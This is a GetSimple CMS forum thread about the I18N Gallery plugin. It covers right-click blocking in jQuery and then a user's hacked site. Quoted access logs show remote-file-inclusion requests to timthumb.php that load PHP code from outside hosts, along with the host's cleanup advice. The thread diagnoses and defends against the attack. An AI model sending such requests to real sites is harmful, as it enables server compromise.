GetSimple Support Forum

Full Version: I18N Gallery
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Zegnåt Wrote:
vasitellapahki Wrote:How do you disable right click from Fancybox (or any of the gallery types, for that matter)? I’d like to restrict image downloading but don’t really want to watermark, I know Imagizer does that…
Note that any download blocking techniques are like obfuscation techniques. They are a pain to the user and will not stop downloading or copying in any way. Google will still index the images in their image search, I can just go there to get it. Or I can select it on the page and press CTRL+C (or CMD+C) to copy it.

The browser will always download the image to be able to display it, this means I can always get this image somewhere.

If you don’t believe me, check out Chris Coyier over at CSS-Tricks, he has an article about fighting image theft. One of the techniques he mentions (#2) would be my favourite: adding a big copyright claim to the bottom of the image and hiding it with CSS. Funny thing, he also puts right-click blocking as ineffective and especially annoying.

Felt like I had to add this point of view to the conversation.

I'm just looking for solution to disable right clicking in Fancybox popup window, it's not that the whole site has right click disabled and I know it's not going to stop anyone who really wants the image... and yes I'm familiar with Firebug :-)
Watermarking is out of question, at least for the time being...

So, now I've got right click disabled for images only with this in
Code:
<head>
of template header file:

Code:
<script type="text/javascript">
$(document).ready(function()
{
$('img').bind("contextmenu", function(e){ return false; })

});
</script>

This works as expected but it does not disable right click in Fancybox popup - I've tried various solutions (including those in devaintart's link, thanks for sharing) which I found but can't figure out where the function should be in... anyone have a suggestion?
Does it go to template header or should it be included in some i18n gallery file to get right click disabling working in Fancypopup?

Or should I perhaps only edit the above mentioned code somehow?

Am I dumb or am I just dumb? :-)
vasitellapahki Wrote:
Code:
<script type="text/javascript">
$(document).ready(function()
{
$('img').bind("contextmenu", function(e){ return false; })

});
</script>

This works as expected but it does not disable right click in Fancybox popup – I’ve tried various solutions which I found but can’t figure out where the function should be in… anyone have a suggestion?

Your problem is that $('img') only contains the images that currently exist in the DOM. Fancybox creates a new IMG element when it shows its box, and this new image never got your function set to it. What you actually want to do is bind the action to an existing element like the document but only trigger it when an image is clicked. Like so:

Code:
$(function(){
    $(document).on('contextmenu', 'img', function(){ return false; });
});

I still do not agree with this, but there you go. You can change the img selector in the .on() function to something more specific if you only want this to apply to images shown in Fancybox.
Zegnåt Wrote:Your problem is that $('img') only contains the images that currently exist in the DOM. Fancybox creates a new IMG element when it shows its box, and this new image never got your function set to it. What you actually want to do is bind the action to an existing element like the document but only trigger it when an image is clicked. Like so:

Code:
$(function(){
    $(document).on('contextmenu', 'img', function(){ return false; });
});

I still do not agree with this, but there you go. You can change the img selector in the .on() function to something more specific if you only want this to apply to images shown in Fancybox.

Okej, tack ska du ha!
I'll try with this.
The site owner wants some protection for images - I haven't such a strong opinion on this one, I guess if it were my site I wouldn't bother to ttry to disable anything :-)


EDIT:
Did not disable right click on Fancybox popup... Sad
I'll try to sort it out...
I went and downloaded this plugin to try some things.
Code:
$(function(){
    $(document).on('contextmenu', 'img', function(){ return false; });
});
Should work. If you only want to block right-clicking the opened Fancybox images you can use this instead:
Code:
$(function(){
    $(document).on('contextmenu', '#fancybox-img', function(){ return false; });
});
But you will need to include your own jQuery in the theme. I18N Gallery includes jQuery 1.4.3, while my code was written for the latest version: 1.7.1.

The older versions of jQuery did not support .on(), but this effect can still be reached in 1.4.3 with the following code:
Code:
$(function(){
    $(document).delegate('#fancybox-img', 'contextmenu', function(){ return false; });
});
Zegnåt Wrote:I went and downloaded this plugin to try some things.
Code:
$(function(){
    $(document).on('contextmenu', 'img', function(){ return false; });
});
Should work. If you only want to block right-clicking the opened Fancybox images you can use this instead:
Code:
$(function(){
    $(document).on('contextmenu', '#fancybox-img', function(){ return false; });
});
But you will need to include your own jQuery in the theme. I18N Gallery includes jQuery 1.4.3, while my code was written for the latest version: 1.7.1.

The older versions of jQuery did not support .on(), but this effect can still be reached in 1.4.3 with the following code:
Code:
$(function(){
    $(document).delegate('#fancybox-img', 'contextmenu', function(){ return false; });
});

Lysande!
Got it working now - thanks for pointing out the jQuery, I had my own jQuery in theme but not quite the latest. I guess that's why none of the other solutions worked? Anyway, changed to 1.7.1 and everything works like charm. Thank you!
Hello!

Is there any possibility to add just a link to a specific gallery inside page content, without getting redirected to the gallery itself after clicking on that link?

Example

Site:
Rooms

Site Content:
Foo.
- Gallery 1
- Gallery 2
- Gallery 3

... if i click on "Gallery 2" the chosen display-type (Fancybox etc.) opens and the images / pictures can be browsed, but i stay on current site (Rooms).

Thanks a lot!
Rob
:-)

- - -

GetSimple 3.1
I18N Gallery 1.7.3
Robzilla Wrote:Is there any possibility to add just a link to a specific gallery inside page content, without getting redirected to the gallery itself after clicking on that link?

... if i click on "Gallery 2" the chosen display-type (Fancybox etc.) opens and the images / pictures can be browsed, but i stay on current site (Rooms).

See http://get-simple.info/forum/post/25216/#p25216.
Hello~
I'm interested in adding another Slider option into I18N Gallery. Is there a guide where I can start on doing this?

Many thanks Big Grin
Hallo douten,

you find some examples for gallery-parameters here: http://mvlcek.bplaced.net/get-simple/i18ngallery

and somewhere here in the forum is a documentation how to add more parameters or install other galleries, see here:

http://get-simple.info/forum/post/25231/#p25231

you will find how to integrate other galleries to i18ngallery
mvlcek Wrote:
Robzilla Wrote:Is there any possibility to add just a link to a specific gallery inside page content, without getting redirected to the gallery itself after clicking on that link?

... if i click on "Gallery 2" the chosen display-type (Fancybox etc.) opens and the images / pictures can be browsed, but i stay on current site (Rooms).

See http://get-simple.info/forum/post/25216/#p25216.

Thank you dude! You rock! I've got another little question in that topic ^ above, maybe you know how to solve this.
douten Wrote:I'm interested in adding another Slider option into I18N Gallery. Is there a guide where I can start on doing this?

I've added a short description to the support site.
Recently I had some issues with a site I maintain, someone had uploaded two folders and it wasnt me, I contacted my server. Here's what they had to say :

"Thanks for contacting us. Checking the logs and the files, it looks as though this was actually down to the gallery plugin that you had on your site being compromise. There is nothing showing in the FTP logs in relation to these folders being created and uploaded, therefore it would seem that this as said, was down to the script being compromise. I would recommend that you investigate this gallery and ensure that this is running the most up to date version to ensure any security or exploits in this code are resolved.

If you have a known clean backup of the site, I would suggest that this is uploaded to your pacakge, as it could be that once this script has been hacked and tampered with, slight changes would have been made to leave this open for possible returns. You might be better to remove and re-install this script and gallery in regards to ensuring the files."

Obviously this is super concerning. And a real shame as this is by far and away my favorite thing about GetSimple.

Update! Think I upset the guy at the host, but they sent me the log hope it helps :


rcosstickphoto.com-access_log.7.gz:rcosstickphoto.com 207.255.175.25 - - [05/Mar/2012:20:49:33 +0000] "GET /it/nc-peace-sign-free-needlepoint/ HTTP/1.1" 200 809 "http://www.google.com/imgres?q=perler+bead+peace+patterns&start=179&um=1&hl=en&biw=1600&bih=666&addh=36&tbm=isch&tbnid= hH5RVBXilR1U1M:&imgrefurl=http://rcosstickphoto.com/it/nc-peace-sign-free-needlepoint/&docid=l2YHtCH1gM0w6M&imgurl=http:/ /0.tqn.com/d/crossstitch/1/0/b/q/-/-/peacesign.jpg&w=972&h=999&ei=oyZVT9aWMYGx0AHG5rz_Dw&zoom=1&iact=rc&dur=78&sig=115058 349598720292892&page=7&tbnh=146&tbnw=142&ndsp=31&ved=1t:429,r:20,s:179&tx=198&ty=-3" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.3; SearchToolbar 1.2; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; AskTbGAM1/5.12.2.16749)"
rcosstickphoto.com-access_log.7.gz:rcosstickphoto.com 207.255.175.25 - - [05/Mar/2012:20:49:58 +0000] "GET /it/nc-peace-sign-free-needlepoint/ HTTP/1.1" 200 809 "http://www.google.com/imgres?q=perler+bead+peace+patterns&start=179&um=1&hl=en&biw=1600&bih=666&addh=36&tbm=isch&tbnid= hH5RVBXilR1U1M:&imgrefurl=http://rcosstickphoto.com/it/nc-peace-sign-free-needlepoint/&docid=l2YHtCH1gM0w6M&imgurl=http:/ /0.tqn.com/d/crossstitch/1/0/b/q/-/-/peacesign.jpg&w=972&h=999&ei=oyZVT9aWMYGx0AHG5rz_Dw&zoom=1&iact=rc&dur=78&sig=115058 349598720292892&page=7&tbnh=146&tbnw=142&ndsp=31&ved=1t:429,r:20,s:179&tx=198&ty=-3" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.3; SearchToolbar 1.2; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; AskTbGAM1/5.12.2.16749)"

These guys are being dicks.
Thanks for the reply guys. Since I'm still very new to development I decided I don't have to put in a whole new slider, but just edit one. I was able to achieve a thumbnail for pagers on the cycle slideshow. Once clean some stuff up I'd be glad to share it back if you want Big Grin
Well I know it's because of a script injection the question is what can be done about it?
Connie Wrote:rcosstickphoto

It's beacuse some exploited the plugin with script injection, have mentioned it here, but no ones said anything.
I´m not sure are you point it is a security bug in getsimple
or it is a security bug in I18N Gallery ?
gugu Wrote:I´m not sure are you point it is a security bug in getsimple
or it is a security bug in I18N Gallery ?


Well thats the question isn't it, my server says the gallery, or is it just the nature of flat file xml?

Either way a hole that lets someone upload to your server space is serious. Not everyone has ssl, and most people wouldn't know what to do if this happened.

It's certainly a problem though.
devaintfire Wrote:Well I know it's because of a script injection the question is what can be done about it?

Sorry, but so far I haven't seen any reference to I18N Gallery in your post and could not find any indication of it causing your problem.
They gave one last suggestion which was this

"A simple way to remove the ability for attackers to use remote file inclusion is to add a "php.ini" file at the top-level of the website with the following contents - be aware though that the web-site will need testing afterwards to ensure that no legitimate web-site scripted actions have been affected by the change.

------------------------------
The php.ini directives are...

allow_url_include = "0"
allow_url_fopen = "0"
------------------------------"
devaintfire Wrote:They gave one last suggestion which was this

"A simple way to remove the ability for attackers to use remote file inclusion is to add a "php.ini" file at the top-level of the website with the following contents - be aware though that the web-site will need testing afterwards to ensure that no legitimate web-site scripted actions have been affected by the change.

------------------------------
The php.ini directives are...

allow_url_include = "0"
allow_url_fopen = "0"
------------------------------"


Here's the whole message they sent me.

Hi Robert,

Thanks for contacting us.

I have a read through your ticket and had a look through your site. The information you are requesting is as follows.


rcosstickphoto.com-access_log.7.gz:rcosstickphoto.com 207.255.175.25 - - [05/Mar/2012:20:49:33 +0000] "GET /it/nc-peace-sign-free-needlepoint/ HTTP/1.1" 200 809 "http://www.google.com/imgres?q=perler+bead+peace+patterns&start=179&um=1&hl=en&biw=1600&bih=666&addh=36&tbm=isch&tbnid= hH5RVBXilR1U1M:&imgrefurl=http://rcosstickphoto.com/it/nc-peace-sign-free-needlepoint/&docid=l2YHtCH1gM0w6M&imgurl=http:/ /0.tqn.com/d/crossstitch/1/0/b/q/-/-/peacesign.jpg&w=972&h=999&ei=oyZVT9aWMYGx0AHG5rz_Dw&zoom=1&iact=rc&dur=78&sig=115058 349598720292892&page=7&tbnh=146&tbnw=142&ndsp=31&ved=1t:429,r:20,s:179&tx=198&ty=-3" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.3; SearchToolbar 1.2; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; AskTbGAM1/5.12.2.16749)"
rcosstickphoto.com-access_log.7.gz:rcosstickphoto.com 207.255.175.25 - - [05/Mar/2012:20:49:58 +0000] "GET /it/nc-peace-sign-free-needlepoint/ HTTP/1.1" 200 809 "http://www.google.com/imgres?q=perler+bead+peace+patterns&start=179&um=1&hl=en&biw=1600&bih=666&addh=36&tbm=isch&tbnid= hH5RVBXilR1U1M:&imgrefurl=http://rcosstickphoto.com/it/nc-peace-sign-free-needlepoint/&docid=l2YHtCH1gM0w6M&imgurl=http:/ /0.tqn.com/d/crossstitch/1/0/b/q/-/-/peacesign.jpg&w=972&h=999&ei=oyZVT9aWMYGx0AHG5rz_Dw&zoom=1&iact=rc&dur=78&sig=115058 349598720292892&page=7&tbnh=146&tbnw=142&ndsp=31&ved=1t:429,r:20,s:179&tx=198&ty=-3" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.3; SearchToolbar 1.2; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; AskTbGAM1/5.12.2.16749)"

These are the logs for what appears to be the exploit on site. The IP address which has done this appears to be 207.255.175.25.

It appears that your site has been subject to an attack via a method known as script injection. Typically, this works by forcing a site to execute code when it was expecting to process another input, fake .txt files are often used for this purpose.Because script injection attacks the site code itself, it is able to completely avoid webserver security.

Subsequently we have disabled the hosting account, however FTP access is still available.

1) Firstly all files in the hosting space must be removed before we can reactivate. You can either ask us to do this for you or let us know when you have done this yourself - when we can see the hosting space is empty it will be reactivated

2) Change all passwords associated with this account. This includes FTP, eXtend, databases, mailboxes, etc. If the site connects to any external data sources - databases, rss feeds, etc. change the password there as well and modify scripts as necessary.

3) Run full virus scans (with up-to-date definitions) on any and all computers that have been used to FTP to the site.

4) Rebuild the site from scratch using the latest versions of the software used for the site from a known clean source

5) Make sure directories are only set to 755 or 711 only - do not ever use 777 permissions.

If using common CMS software as these infections commonly come via addon modules, extensions and themes, we'd suggest limiting these to only those necessary and taking care to ensure that they come from the module provider's home-site. Many of these themes/modules/extensions are available pre-infected on third-party sites.

A simple way to remove the ability for attackers to use remote file inclusion is to add a "php.ini" file at the top-level of the website with the following contents - be aware though that the web-site will need testing afterwards to ensure that no legitimate web-site scripted actions have been affected by the change.

------------------------------
The php.ini directives are...

allow_url_include = "0"
allow_url_fopen = "0"
------------------------------


They seem pretty sure it's down to the gallery, I gave em hell last night, but if it is a problem with the gallery surely it should be sorted?
Ok so I went back and hassled them more here's what they said :

All of the following hits returned successful results on a script called timthumb.php

rcosstickphoto.com-access_log.2.gz:rcosstickphoto.com 72.10.55.173 - - [21/Mar/2012:08:55:49 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php?src=http://blogger.com.chicolisto.com/cok.php HTTP/1.1" 200 4840 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
rcosstickphoto.com-access_log.2.gz:rcosstickphoto.com 72.10.55.173 - - [21/Mar/2012:09:03:33 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php?src=http://blogger.com.chicolisto.com/cok.php HTTP/1.1" 200 4840 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
rcosstickphoto.com-access_log.2.gz:rcosstickphoto.com 72.10.55.173 - - [21/Mar/2012:20:00:32 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php?src=http://blogger.com.chicolisto.com/cok.php HTTP/1.1" 200 4840 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
rcosstickphoto.com-access_log.2.gz:rcosstickphoto.com 64.16.220.154 - - [21/Mar/2012:23:32:02 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php?src=http://blogger.com.nilgirisrealty.com/cok .php HTTP/1.1" 200 4984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
rcosstickphoto.com-access_log.2.gz:rcosstickphoto.com 64.16.220.154 - - [21/Mar/2012:23:32:03 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php?src=http://blogger.com.nilgirisrealty.com/cok .php HTTP/1.1" 200 4735 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1Wink"
rcosstickphoto.com-access_log.6.gz:rcosstickphoto.com 46.182.216.13 - - [10/Mar/2012:18:25:29 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/widescreen/includes/timthumb.php?src=http://blogger.com.nilgirisrealty.com/cok .php HTTP/1.1" 200 4705 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
devaintfire Wrote:The php.ini directives are...

allow_url_include = "0"
allow_url_fopen = "0"
------------------------------
URL include should definitely by off by default. You should never need it.
Switching URL fopen off will disable GetSimple version/plugin update check, etc.

devaintfire Wrote:They seem pretty sure it's down to the gallery, I gave em hell last night, but if it is a problem with the gallery surely it should be sorted?

You site IS a gallery (with a contact form). So are you sure they really meant the I18N Gallery plugin or rather the site as a whole? In either case I do not see anything that could indicate something wrong with my plugin?

devaintfire Wrote:All of the following hits returned successful results on a script called timthumb.php

rcosstickphoto.com-access_log.2.gz:rcosstickphoto.com 72.10.55.173 - - [21/Mar/2012:08:55:49 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php?src=http://blogger.com.chicolisto.com/cok.php HTTP/1.1" 200 4840 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"

If I understand this log entry correctly it accesses the timthumb.php on your server. wp-content seems to indicate that you have Wordpress installed?
Nope no wordpress here, just getsimple, is it part of the plugin that resizes and crops the image?

http://code.google.com/p/timthumb/

First time I've encountered this php

Just sent this to the server :

"In fact looking at that path, the script you say that's been compromised and allowed content to be uploaded to my site, is in fact inside a directory that was erroneously and with out authorization, uploaded to my site, your suggesting that the security breech is in face a paradox."

Lets see what they say.
devaintfire Wrote:Nope no wordpress here, just getsimple, is it part of the plugin that resizes and crops the image?

No, it isn't.
Is /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php one of the directories/files having been created?
mvlcek Wrote:
devaintfire Wrote:Nope no wordpress here, just getsimple, is it part of the plugin that resizes and crops the image?

No, it isn't.
Is /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php one of the directories/files having been created?


Yeah it is, so I am guessing that they are suggesting that the illegally uploaded directory contains the exploited script, a paradox!